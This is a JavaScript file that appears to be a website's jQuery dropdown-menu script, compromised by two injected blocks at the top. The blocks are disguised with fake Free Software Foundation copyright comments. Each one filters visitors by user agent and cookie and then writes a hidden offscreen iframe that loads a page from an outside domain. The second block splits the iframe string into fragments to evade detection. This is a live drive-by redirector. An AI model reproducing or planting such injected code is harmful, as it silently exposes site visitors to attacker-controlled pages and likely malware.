/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
var a=document.cookie.match(new RegExp("(?:^|; )"+"ipmoture_aurma".replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)")),b=void 0===(a?decodeURIComponent(a[1]):void 0),c="Linux;Windows NT 6.3;Windows NT 6.2;rv:11.0;AppleWebKit;Android;Googlebot;IEMobile;Yandex".split(";"),d=!1,e;for(e in c){var f=0;if(-1!==(f=(navigator.userAgent+"").toLowerCase().indexOf((c[e]+"").toLowerCase(),void 0))&&f){d=!0;break}}
!d&&b&&(document.write('<iframe src="http://rayanet.serralheriaguararema.com.br/simplemist17.html?k" style="border-right-style: dotted;top: -997px;left: -997px;border-top-width: 5px;position: absolute;border-top-width: 6px;" height="141" width="141"></iframe>'),document.cookie="ipmoture_aurma=1; path=/; expires="+(new Date((new Date).getTime()+1728E5)).toUTCString());
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*///Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var leonmain = 0;
 if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
  return leonmain;
 }
 return false;
}
function control_agent(){
 var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/26.0','Firefox/27.0','Firefox/27.0.1','Firefox/27.0.2','Firefox/28.0','Maxthon','BlackBerry'];
 var black_agent = false;
 for (var i in see_agent) {
  if (stripos(navigator.userAgent, see_agent[i])) {
   black_agent = true;
   break;
  }
 }
 return black_agent;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var match = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return match ? decodeURIComponent(match[1]) : undefined;
}
if (!control_agent()) {
 var cookie = getCookie('kakupe18ajent18s7fyry');
 if (cookie == undefined) {
  setCookie('kakupe18ajent18s7fyry', true, 172804);	
  document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://dune.manonsmanden.nl/hdgsfgewgewhr19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1285'+'px'+';'+'top'+':'+'-'+'1285'+'px'+';'+'" height="135" width="135"><'+'/'+'if'+'ram'+'e'+'>');
 }
};
})();
//Finally,every:program.is.threatened.constantly.by,software.patents.<!--

var timeout         = 500;
var closetimer		= 0;
var ddmenuitem      = 0;

function dropmenu_open()
{	dropmenu_canceltimer();
	dropmenu_close();
	ddmenuitem = $(this).find('ul').eq(0).css('visibility', 'visible');}

function dropmenu_close()
{	if(ddmenuitem) ddmenuitem.css('visibility', 'hidden');}

function dropmenu_timer()
{	closetimer = window.setTimeout(dropmenu_close, timeout);}

function dropmenu_canceltimer()
{	if(closetimer)
	{	window.clearTimeout(closetimer);
		closetimer = null;}}



$(document).ready(function(){
	$('#dropmenu > li').bind('mouseover', dropmenu_open);
	$('#dropmenu > li').bind('mouseout',  dropmenu_timer);
	$('#dropmenu').find('a').eq(0).addClass('dropmenu_now');
});

document.onclick = dropmenu_close;

-->